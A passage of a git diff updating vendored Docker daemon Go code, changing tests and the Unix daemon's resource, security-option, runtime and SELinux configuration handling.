root: tmp, } - daemon.volumes, err = store.New(tmp) + daemon.volumes, err = volumesservice.NewVolumeService(tmp, nil, idtools.IDPair{UID: 0, GID: 0}, daemon) if err != nil { return nil, err } - - volumesDriver, err := local.New(tmp, 0, 0) - if err != nil { - return nil, err - } - volumedrivers.Register(volumesDriver, volumesDriver.Name()) - return daemon, nil } @@ -158,6 +143,10 @@ func TestValidContainerNames(t *testing.T) { } func TestContainerInitDNS(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") // for chown + } + tmp, err := ioutil.TempDir("", "docker-container-test-") if err != nil { t.Fatal(err) @@ -187,7 +176,7 @@ func TestContainerInitDNS(t *testing.T) { "UpdateDns":false,"Volumes":{},"VolumesRW":{},"AppliedVolumesFrom":null}` // Container struct only used to retrieve path to config file - container := &container.Container{CommonContainer: container.CommonContainer{Root: containerPath}} + container := &container.Container{Root: containerPath} configPath, err := container.ConfigPath() if err != nil { t.Fatal(err) @@ -213,7 +202,6 @@ func TestContainerInitDNS(t *testing.T) { if err != nil { t.Fatal(err) } - defer volumedrivers.Unregister(volume.DefaultDriverName) c, err := daemon.load(containerID) if err != nil { @@ -314,314 +302,18 @@ func TestMerge(t *testing.T) { } } -func TestDaemonReloadLabels(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:bar"}, - }, - } - - valuesSets := make(map[string]interface{}) - valuesSets["labels"] = "foo:baz" - newConfig := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:baz"}, - valuesSet: valuesSets, - }, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - label := daemon.configStore.Labels[0] - if label != "foo:baz" { - t.Fatalf("Expected daemon label `foo:baz`, got %s", label) - } -} - -func TestDaemonReloadInsecureRegistries(t *testing.T) { - daemon := &Daemon{} - // initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000" - daemon.RegistryService = registry.NewService(registry.ServiceOptions{ - InsecureRegistries: []string{ - "127.0.0.0/8", - "10.10.1.11:5000", - "10.10.1.22:5000", // this will be removed when reloading - "docker1.com", - "docker2.com", // this will be removed when reloading - }, - }) - - daemon.configStore = &Config{} - - insecureRegistries := []string{ - "127.0.0.0/8", // this will be kept - "10.10.1.11:5000", // this will be kept - "10.10.1.33:5000", // this will be newly added - "docker1.com", // this will be kept - "docker3.com", // this will be newly added - } - - valuesSets := make(map[string]interface{}) - valuesSets["insecure-registries"] = insecureRegistries - - newConfig := &Config{ - CommonConfig: CommonConfig{ - ServiceOptions: registry.ServiceOptions{ - InsecureRegistries: insecureRegistries, - }, - valuesSet: valuesSets, - }, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - // After Reload, daemon.RegistryService will be changed which is useful - // for registry communication in daemon. - registries := daemon.RegistryService.ServiceConfig() - - // After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon. - // Then collect registries.InsecureRegistryCIDRs in dataMap. - // When collecting, we need to convert CIDRS into string as a key, - // while the times of key appears as value. - dataMap := map[string]int{} - for _, value := range registries.InsecureRegistryCIDRs { - if _, ok := dataMap[value.String()]; !ok { - dataMap[value.String()] = 1 - } else { - dataMap[value.String()]++ - } - } - - for _, value := range registries.IndexConfigs { - if _, ok := dataMap[value.Name]; !ok { - dataMap[value.Name] = 1 - } else { - dataMap[value.Name]++ - } - } - - // Finally compare dataMap with the original insecureRegistries. - // Each value in insecureRegistries should appear in daemon's insecure registries, - // and each can only appear exactly ONCE. - for _, r := range insecureRegistries { - if value, ok := dataMap[r]; !ok { - t.Fatalf("Expected daemon insecure registry %s, got none", r) - } else if value != 1 { - t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value) - } - } - - // assert if "10.10.1.22:5000" is removed when reloading - if value, ok := dataMap["10.10.1.22:5000"]; ok { - t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value) - } - - // assert if "docker2.com" is removed when reloading - if value, ok := dataMap["docker2.com"]; ok { - t.Fatalf("Expected no insecure registry of docker2.com, got %d", value) - } -} - -func TestDaemonReloadNotAffectOthers(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:bar"}, - Debug: true, - }, - } - - valuesSets := make(map[string]interface{}) - valuesSets["labels"] = "foo:baz" - newConfig := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:baz"}, - valuesSet: valuesSets, - }, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } +func TestValidateContainerIsolation(t *testing.T) { + d := Daemon{} - label := daemon.configStore.Labels[0] - if label != "foo:baz" { - t.Fatalf("Expected daemon label `foo:baz`, got %s", label) - } - debug := daemon.configStore.Debug - if !debug { - t.Fatalf("Expected debug 'enabled', got 'disabled'") - } + _, err := d.verifyContainerSettings(runtime.GOOS, &containertypes.HostConfig{Isolation: containertypes.Isolation("invalid")}, nil, false) + assert.Check(t, is.Error(err, "invalid isolation 'invalid' on "+runtime.GOOS)) } -func TestDaemonDiscoveryReload(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1", - ClusterAdvertise: "127.0.0.1:3333", - }, - } - - if err := daemon.initDiscovery(daemon.configStore); err != nil { - t.Fatal(err) +func TestFindNetworkErrorType(t *testing.T) { + d := Daemon{} + _, err := d.FindNetwork("fakeNet") + _, ok := errors.Cause(err).(libnetwork.ErrNoSuchNetwork) + if !errdefs.IsNotFound(err) || !ok { + t.Error("The FindNetwork method MUST always return an error that implements the NotFound interface and is ErrNoSuchNetwork") } - - expected := discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "3333"}, - } - - select { - case <-time.After(10 * time.Second): - t.Fatal("timeout waiting for discovery") - case <-daemon.discoveryWatcher.ReadyCh(): - } - - stopCh := make(chan struct{}) - defer close(stopCh) - ch, errCh := daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } - - valuesSets := make(map[string]interface{}) - valuesSets["cluster-store"] = "memory://127.0.0.1:2222" - valuesSets["cluster-advertise"] = "127.0.0.1:5555" - newConfig := &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1:2222", - ClusterAdvertise: "127.0.0.1:5555", - valuesSet: valuesSets, - }, - } - - expected = discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - select { - case <-time.After(10 * time.Second): - t.Fatal("timeout waiting for discovery") - case <-daemon.discoveryWatcher.ReadyCh(): - } - - ch, errCh = daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } -} - -func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{} - - valuesSet := make(map[string]interface{}) - valuesSet["cluster-store"] = "memory://127.0.0.1:2222" - valuesSet["cluster-advertise"] = "127.0.0.1:5555" - newConfig := &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1:2222", - ClusterAdvertise: "127.0.0.1:5555", - valuesSet: valuesSet, - }, - } - - expected := discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - select { - case <-time.After(10 * time.Second): - t.Fatal("timeout waiting for discovery") - case <-daemon.discoveryWatcher.ReadyCh(): - } - - stopCh := make(chan struct{}) - defer close(stopCh) - ch, errCh := daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } -} - -func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1", - }, - } - valuesSets := make(map[string]interface{}) - valuesSets["cluster-advertise"] = "127.0.0.1:5555" - newConfig := &Config{ - CommonConfig: CommonConfig{ - ClusterAdvertise: "127.0.0.1:5555", - valuesSet: valuesSets, - }, - } - expected := discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - select { - case <-daemon.discoveryWatcher.ReadyCh(): - case <-time.After(10 * time.Second): - t.Fatal("Timeout waiting for discovery") - } - stopCh := make(chan struct{}) - defer close(stopCh) - ch, errCh := daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } - } diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix.go b/vendor/github.com/docker/docker/daemon/daemon_unix.go index 5b3ffeb72d..e2c77610d4 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_unix.go +++ b/vendor/github.com/docker/docker/daemon/daemon_unix.go @@ -1,9 +1,10 @@ // +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "bytes" + "bufio" + "context" "fmt" "io/ioutil" "net" @@ -13,22 +14,26 @@ import ( "runtime/debug" "strconv" "strings" - "syscall" "time" - "github.com/Sirupsen/logrus" + containerd_cgroups "github.com/containerd/cgroups" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/blkiodev" pblkiodev "github.com/docker/docker/api/types/blkiodev" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/image" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/initlayer" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/docker/pkg/sysinfo" "github.com/docker/docker/runconfig" - runconfigopts "github.com/docker/docker/runconfig/opts" + volumemounts "github.com/docker/docker/volume/mounts" "github.com/docker/libnetwork" nwconfig "github.com/docker/libnetwork/config" "github.com/docker/libnetwork/drivers/bridge" @@ -36,16 +41,25 @@ import ( "github.com/docker/libnetwork/netutils" "github.com/docker/libnetwork/options" lntypes "github.com/docker/libnetwork/types" - "github.com/golang/protobuf/ptypes" "github.com/opencontainers/runc/libcontainer/cgroups" - "github.com/opencontainers/runc/libcontainer/label" rsystem "github.com/opencontainers/runc/libcontainer/system" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/selinux/go-selinux/label" "github.com/pkg/errors" + "github.com/sirupsen/logrus" "github.com/vishvananda/netlink" + "golang.org/x/sys/unix" ) const ( + // DefaultShimBinary is the default shim to be used by containerd if none + // is specified + DefaultShimBinary = "docker-containerd-shim" + + // DefaultRuntimeBinary is the default runtime to be used by + // containerd if none is specified + DefaultRuntimeBinary = "docker-runc" + // See https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/tree/kernel/sched/sched.h?id=8cd9234c64c584432f6992fe944ca9e46ca8ea76#n269 linuxMinCPUShares = 2 linuxMaxCPUShares = 262144 @@ -53,30 +67,35 @@ const ( // It's not kernel limit, we want this 4M limit to supply a reasonable functional container linuxMinMemory = 4194304 // constants for remapped root settings - defaultIDSpecifier string = "default" - defaultRemappedID string = "dockremap" + defaultIDSpecifier = "default" + defaultRemappedID = "dockremap" // constant for cgroup drivers cgroupFsDriver = "cgroupfs" cgroupSystemdDriver = "systemd" + + // DefaultRuntimeName is the default runtime to be used by + // containerd if none is specified + DefaultRuntimeName = "docker-runc" ) -func getMemoryResources(config containertypes.Resources) *specs.Memory { - memory := specs.Memory{} +type containerGetter interface { + GetContainer(string) (*container.Container, error) +} + +func getMemoryResources(config containertypes.Resources) *specs.LinuxMemory { + memory := specs.LinuxMemory{} if config.Memory > 0 { - limit := uint64(config.Memory) - memory.Limit = &limit + memory.Limit = &config.Memory } if config.MemoryReservation > 0 { - reservation := uint64(config.MemoryReservation) - memory.Reservation = &reservation + memory.Reservation = &config.MemoryReservation } - if config.MemorySwap != 0 { - swap := uint64(config.MemorySwap) - memory.Swap = &swap + if config.MemorySwap > 0 { + memory.Swap = &config.MemorySwap } if config.MemorySwappiness != nil { @@ -84,36 +103,40 @@ func getMemoryResources(config containertypes.Resources) *specs.Memory { memory.Swappiness = &swappiness } + if config.OomKillDisable != nil { + memory.DisableOOMKiller = config.OomKillDisable + } + if config.KernelMemory != 0 { - kernelMemory := uint64(config.KernelMemory) - memory.Kernel = &kernelMemory + memory.Kernel = &config.KernelMemory } return &memory } -func getCPUResources(config containertypes.Resources) *specs.CPU { - cpu := specs.CPU{} +func getCPUResources(config containertypes.Resources) (*specs.LinuxCPU, error) { + cpu := specs.LinuxCPU{} - if config.CPUShares != 0 { + if config.CPUShares < 0 { + return nil, fmt.Errorf("shares: invalid argument") + } + if config.CPUShares >= 0 { shares := uint64(config.CPUShares) cpu.Shares = &shares } if config.CpusetCpus != "" { - cpuset := config.CpusetCpus - cpu.Cpus = &cpuset + cpu.Cpus = config.CpusetCpus } if config.CpusetMems != "" { - cpuset := config.CpusetMems - cpu.Mems = &cpuset + cpu.Mems = config.CpusetMems } if config.NanoCPUs > 0 { // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt period := uint64(100 * time.Millisecond / time.Microsecond) - quota := uint64(config.NanoCPUs) * period / 1e9 + quota := config.NanoCPUs * int64(period) / 1e9 cpu.Period = &period cpu.Quota = "a } @@ -124,8 +147,8 @@ func getCPUResources(config containertypes.Resources) *specs.CPU { } if config.CPUQuota != 0 { - quota := uint64(config.CPUQuota) - cpu.Quota = "a + q := config.CPUQuota + cpu.Quota = &q } if config.CPURealtimePeriod != 0 { @@ -134,23 +157,23 @@ func getCPUResources(config containertypes.Resources) *specs.CPU { } if config.CPURealtimeRuntime != 0 { - runtime := uint64(config.CPURealtimeRuntime) - cpu.RealtimeRuntime = &runtime + c := config.CPURealtimeRuntime + cpu.RealtimeRuntime = &c } - return &cpu + return &cpu, nil } -func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevice, error) { - var stat syscall.Stat_t - var blkioWeightDevices []specs.WeightDevice +func getBlkioWeightDevices(config containertypes.Resources) ([]specs.LinuxWeightDevice, error) { + var stat unix.Stat_t + var blkioWeightDevices []specs.LinuxWeightDevice for _, weightDevice := range config.BlkioWeightDevice { - if err := syscall.Stat(weightDevice.Path, &stat); err != nil { + if err := unix.Stat(weightDevice.Path, &stat); err != nil { return nil, err } weight := weightDevice.Weight - d := specs.WeightDevice{Weight: &weight} + d := specs.LinuxWeightDevice{Weight: &weight} d.Major = int64(stat.Rdev / 256) d.Minor = int64(stat.Rdev % 256) blkioWeightDevices = append(blkioWeightDevices, d) @@ -159,6 +182,11 @@ func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevic return blkioWeightDevices, nil } +func (daemon *Daemon) parseSecurityOpt(container *container.Container, hostConfig *containertypes.HostConfig) error { + container.NoNewPrivileges = daemon.configStore.NoNewPrivileges + return parseSecurityOpt(container, hostConfig) +} + func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { var ( labelOpts []string @@ -170,15 +198,18 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos container.NoNewPrivileges = true continue } + if opt == "disable" { + labelOpts = append(labelOpts, "disable") + continue + } var con []string if strings.Contains(opt, "=") { con = strings.SplitN(opt, "=", 2) } else if strings.Contains(opt, ":") { con = strings.SplitN(opt, ":", 2) - logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 1.14, use `=` instead.") + logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 17.04, use `=` instead.") } - if len(con) != 2 { return fmt.Errorf("invalid --security-opt 1: %q", opt) } @@ -190,6 +221,12 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos container.AppArmorProfile = con[1] case "seccomp": container.SeccompProfile = con[1] + case "no-new-privileges": + noNewPrivileges, err := strconv.ParseBool(con[1]) + if err != nil { + return fmt.Errorf("invalid --security-opt 2: %q", opt) + } + container.NoNewPrivileges = noNewPrivileges default: return fmt.Errorf("invalid --security-opt 2: %q", opt) } @@ -199,16 +236,15 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos return err } -func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.ThrottleDevice, error) { - var throttleDevices []specs.ThrottleDevice - var stat syscall.Stat_t +func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.LinuxThrottleDevice, error) { + var throttleDevices []specs.LinuxThrottleDevice + var stat unix.Stat_t for _, d := range devs { - if err := syscall.Stat(d.Path, &stat); err != nil { + if err := unix.Stat(d.Path, &stat); err != nil { return nil, err } - rate := d.Rate - d := specs.ThrottleDevice{Rate: &rate} + d := specs.LinuxThrottleDevice{Rate: d.Rate} d.Major = int64(stat.Rdev / 256) d.Minor = int64(stat.Rdev % 256) throttleDevices = append(throttleDevices, d) @@ -254,18 +290,28 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf hostConfig.MemorySwap = hostConfig.Memory * 2 } if hostConfig.ShmSize == 0 { - hostConfig.ShmSize = container.DefaultSHMSize + hostConfig.ShmSize = config.DefaultShmSize + if daemon.configStore != nil { + hostConfig.ShmSize = int64(daemon.configStore.ShmSize) + } + } + // Set default IPC mode, if unset for container + if hostConfig.IpcMode.IsEmpty() { + m := config.DefaultIpcMode + if daemon.configStore != nil { + m = daemon.configStore.IpcMode + } + hostConfig.IpcMode = containertypes.IpcMode(m) } + + adaptSharedNamespaceContainer(daemon, hostConfig) + var err error - opts, err := daemon.generateSecurityOpt(hostConfig.IpcMode, hostConfig.PidMode, hostConfig.Privileged) + opts, err := daemon.generateSecurityOpt(hostConfig) if err != nil { return err } hostConfig.SecurityOpt = append(hostConfig.SecurityOpt, opts...) - if hostConfig.MemorySwappiness == nil { - defaultSwappiness := int64(-1) - hostConfig.MemorySwappiness = &defaultSwappiness - } if hostConfig.OomKillDisable == nil { defaultOomKillDisable := false hostConfig.OomKillDisable = &defaultOomKillDisable @@ -274,8 +320,39 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf return nil } +// adaptSharedNamespaceContainer replaces container name with its ID in hostConfig. +// To be more precisely, it modifies `container:name` to `container:ID` of PidMode, IpcMode +// and NetworkMode. +// +// When a container shares its namespace with another container, use ID can keep the namespace +// sharing connection between the two containers even the another container is renamed. +func adaptSharedNamespaceContainer(daemon containerGetter, hostConfig *containertypes.HostConfig) { + containerPrefix := "container:" + if hostConfig.PidMode.IsContainer() { + pidContainer := hostConfig.PidMode.Container() + // if there is any error returned here, we just ignore it and leave it to be + // handled in the following logic + if c, err := daemon.GetContainer(pidContainer); err == nil { + hostConfig.PidMode = containertypes.PidMode(containerPrefix + c.ID) + } + } + if hostConfig.IpcMode.IsContainer() { + ipcContainer := hostConfig.IpcMode.Container() + if c, err := daemon.GetContainer(ipcContainer); err == nil { + hostConfig.IpcMode = containertypes.IpcMode(containerPrefix + c.ID) + } + } + if hostConfig.NetworkMode.IsContainer() { + netContainer := hostConfig.NetworkMode.ConnectedContainer() + if c, err := daemon.GetContainer(netContainer); err == nil { + hostConfig.NetworkMode = containertypes.NetworkMode(containerPrefix + c.ID) + } + } +} + func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysinfo.SysInfo, update bool) ([]string, error) { warnings := []string{} + fixMemorySwappiness(resources) // memory subsystem checks and adjustments if resources.Memory != 0 && resources.Memory < linuxMinMemory { @@ -298,14 +375,14 @@ func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysi if resources.Memory == 0 && resources.MemorySwap > 0 && !update { return warnings, fmt.Errorf("You should always set the Memory limit when using Memoryswap limit, see usage") } - if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { + if resources.MemorySwappiness != nil && !sysInfo.MemorySwappiness { warnings = append(warnings, "Your kernel does not support memory swappiness capabilities or the cgroup is not mounted. Memory swappiness discarded.") logrus.Warn("Your kernel does not support memory swappiness capabilities, or the cgroup is not mounted. Memory swappiness discarded.") resources.MemorySwappiness = nil } if resources.MemorySwappiness != nil { swappiness := *resources.MemorySwappiness - if swappiness < -1 || swappiness > 100 { + if swappiness < 0 || swappiness > 100 { return warnings, fmt.Errorf("Invalid value: %v, valid memory swappiness range is 0-100", swappiness) } } @@ -444,6 +521,7 @@ func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysi warnings = append(warnings, "Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") logrus.Warn("Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") resources.BlkioDeviceWriteBps = []*pblkiodev.ThrottleDevice{} + } if len(resources.BlkioDeviceReadIOps) > 0 && !sysInfo.BlkioReadIOpsDevice { warnings = append(warnings, "Your kernel does not support IOPS Block read limit or the cgroup is not mounted. Block I/O IOPS read limit discarded.") @@ -469,7 +547,7 @@ func (daemon *Daemon) getCgroupDriver() string { } // getCD gets the raw value of the native.cgroupdriver option, if set. -func getCD(config *Config) string { +func getCD(config *config.Config) string { for _, option := range config.ExecOptions { key, val, err := parsers.ParseKeyValueOpt(option) if err != nil || !strings.EqualFold(key, "native.cgroupdriver") { @@ -481,7 +559,7 @@ func getCD(config *Config) string { } // VerifyCgroupDriver validates native.cgroupdriver -func VerifyCgroupDriver(config *Config) error { +func VerifyCgroupDriver(config *config.Config) error { cd := getCD(config) if cd == "" || cd == cgroupFsDriver || cd == cgroupSystemdDriver { return nil @@ -490,21 +568,16 @@ func VerifyCgroupDriver(config *Config) error { } // UsingSystemd returns true if cli option includes native.cgroupdriver=systemd -func UsingSystemd(config *Config) bool { +func UsingSystemd(config *config.Config) bool { return getCD(config) == cgroupSystemdDriver } // verifyPlatformContainerSettings performs platform-specific validation of the // hostconfig and config structures. func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { - warnings := []string{} + var warnings []string sysInfo := sysinfo.New(true) - warnings, err := daemon.verifyExperimentalContainerSettings(hostConfig, config) - if err != nil { - return warnings, err - } - w, err := verifyContainerResources(&hostConfig.Resources, sysInfo, update) // no matter err is nil or not, w could have data in itself. @@ -530,13 +603,13 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. // check for various conflicting options with user namespaces if daemon.configStore.RemappedRoot != "" && hostConfig.UsernsMode.IsPrivate() { if hostConfig.Privileged { - return warnings, fmt.Errorf("Privileged mode is incompatible with user namespaces") + return warnings, fmt.Errorf("privileged mode is incompatible with user namespaces. You must run the container in the host namespace when running privileged mode") } if hostConfig.NetworkMode.IsHost() && !hostConfig.UsernsMode.IsHost() { - return warnings, fmt.Errorf("Cannot share the host's network namespace when user namespaces are enabled") + return warnings, fmt.Errorf("cannot share the host's network namespace when user namespaces are enabled") } if hostConfig.PidMode.IsHost() && !hostConfig.UsernsMode.IsHost() { - return warnings, fmt.Errorf("Cannot share the host PID namespace when user namespaces are enabled") + return warnings, fmt.Errorf("cannot share the host PID namespace when user namespaces are enabled") } } if hostConfig.CgroupParent != "" && UsingSystemd(daemon.configStore) { @@ -553,64 +626,92 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. return warnings, fmt.Errorf("Unknown runtime specified %s", hostConfig.Runtime) } + parser := volumemounts.NewParser(runtime.GOOS) + for dest := range hostConfig.Tmpfs { + if err := parser.ValidateTmpfsMountDestination(dest); err != nil { + return warnings, err + } + } + return warnings, nil } -// platformReload update configuration with platform specific options -func (daemon *Daemon) platformReload(config *Config) map[string]string { - if config.IsValueSet("runtimes") { - daemon.configStore.Runtimes = config.Runtimes - // Always set the default one - daemon.configStore.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} - } +func (daemon *Daemon) loadRuntimes() error { + return daemon.initRuntimes(daemon.configStore.Runtimes) +} - if config.DefaultRuntime != "" { - daemon.configStore.DefaultRuntime = config.DefaultRuntime +func (daemon *Daemon) initRuntimes(runtimes map[string]types.Runtime) (err error) { + runtimeDir := filepath.Join(daemon.configStore.Root, "runtimes") + // Remove old temp directory if any + os.RemoveAll(runtimeDir + "-old") + tmpDir, err := ioutils.TempDir(daemon.configStore.Root, "gen-runtimes") + if err != nil { + return errors.Wrapf(err, "failed to get temp dir to generate runtime scripts") } + defer func() { + if err != nil { + if err1 := os.RemoveAll(tmpDir); err1 != nil { + logrus.WithError(err1).WithField("dir", tmpDir). + Warnf("failed to remove tmp dir") + } + return + } - // Update attributes - var runtimeList bytes.Buffer - for name, rt := range daemon.configStore.Runtimes { - if runtimeList.Len() > 0 { - runtimeList.WriteRune(' ') + if err = os.Rename(runtimeDir, runtimeDir+"-old"); err != nil { + return } - runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt)) - } + if err = os.Rename(tmpDir, runtimeDir); err != nil { + err = errors.Wrapf(err, "failed to setup runtimes dir, new containers may not start") + return + } + if err = os.RemoveAll(runtimeDir + "-old"); err != nil { + logrus.WithError(err).WithField("dir", tmpDir). + Warnf("failed to remove old runtimes dir") + } + }() - return map[string]string{ - "runtimes": runtimeList.String(), - "default-runtime": daemon.configStore.DefaultRuntime, + for name, rt := range runtimes { + if len(rt.Args) == 0 { + continue + } + + script := filepath.Join(tmpDir, name) + content := fmt.Sprintf("#!/bin/sh\n%s %s $@\n", rt.Path, strings.Join(rt.Args, " ")) + if err := ioutil.WriteFile(script, []byte(content), 0700); err != nil { + return err + } } + return nil } // verifyDaemonSettings performs validation of daemon config struct -func verifyDaemonSettings(config *Config) error { +func verifyDaemonSettings(conf *config.Config) error { // Check for mutually incompatible config options - if config.bridgeConfig.Iface != "" && config.bridgeConfig.IP != "" { + if conf.BridgeConfig.Iface != "" && conf.BridgeConfig.IP != "" { return fmt.Errorf("You specified -b & --bip, mutually exclusive options. Please specify only one") } - if !config.bridgeConfig.EnableIPTables && !config.bridgeConfig.InterContainerCommunication { + if !conf.BridgeConfig.EnableIPTables && !conf.BridgeConfig.InterContainerCommunication { return fmt.Errorf("You specified --iptables=false with --icc=false. ICC=false uses iptables to function. Please set --icc or --iptables to true") } - if !config.bridgeConfig.EnableIPTables && config.bridgeConfig.EnableIPMasq { - config.bridgeConfig.EnableIPMasq = false + if !conf.BridgeConfig.EnableIPTables && conf.BridgeConfig.EnableIPMasq { + conf.BridgeConfig.EnableIPMasq = false } - if err := VerifyCgroupDriver(config); err != nil { + if err := VerifyCgroupDriver(conf); err != nil { return err } - if config.CgroupParent != "" && UsingSystemd(config) { - if len(config.CgroupParent) <= 6 || !strings.HasSuffix(config.CgroupParent, ".slice") { + if conf.CgroupParent != "" && UsingSystemd(conf) { + if len(conf.CgroupParent) <= 6 || !strings.HasSuffix(conf.CgroupParent, ".slice") { return fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"") } } - if config.DefaultRuntime == "" { - config.DefaultRuntime = stockRuntimeName + if conf.DefaultRuntime == "" { + conf.DefaultRuntime = config.StockRuntimeName } - if config.Runtimes == nil { - config.Runtimes = make(map[string]types.Runtime) + if conf.Runtimes == nil { + conf.Runtimes = make(map[string]types.Runtime) } - config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + conf.Runtimes[config.StockRuntimeName] = types.Runtime{Path: DefaultRuntimeName} return nil } @@ -625,7 +726,7 @@ func checkSystem() error { // configureMaxThreads sets the Go runtime max threads threshold // which is 90% of the kernel setting from /proc/sys/kernel/threads-max -func configureMaxThreads(config *Config) error { +func configureMaxThreads(config *config.Config) error { mt, err := ioutil.ReadFile("/proc/sys/kernel/threads-max") if err != nil { return err @@ -640,11 +741,56 @@ func configureMaxThreads(config *Config) error { return nil } +func overlaySupportsSelinux() (bool, error) { + f, err := os.Open("/proc/kallsyms") + if err != nil { + if os.IsNotExist(err) { + return false, nil + } + return false, err + } + defer f.Close() + + var symAddr, symType, symName, text string + + s := bufio.NewScanner(f) + for s.Scan() { + if err := s.Err(); err != nil { + return false, err + } + + text = s.Text() + if _, err := fmt.Sscanf(text, "%s %s %s", &symAddr, &symType, &symName); err != nil { + return false, fmt.Errorf("Scanning '%s' failed: %s", text, err) + } + + // Check for presence of symbol security_inode_copy_up. + if symName == "security_inode_copy_up" { + return true, nil + } + } + return false, nil +} + // configureKernelSecuritySupport configures and validates security support for the kernel -func configureKernelSecuritySupport(config *Config, driverName string) error { +func configureKernelSecuritySupport(config *config.Config, driverName string) error { if config.EnableSelinuxSupport { if !selinuxEnabled() { logrus.Warn("Docker could not enable SELinux on the host system") + return nil + } + + if driverName == "overlay" || driverName == "overlay2" { + // If driver is overlay or overlay2, make sure kernel + // supports selinux with overlay. + supported, err := overlaySupportsSelinux() + if err != nil { + return err + } + + if !supported { + logrus.Warnf("SELinux is not supported with the %v graph 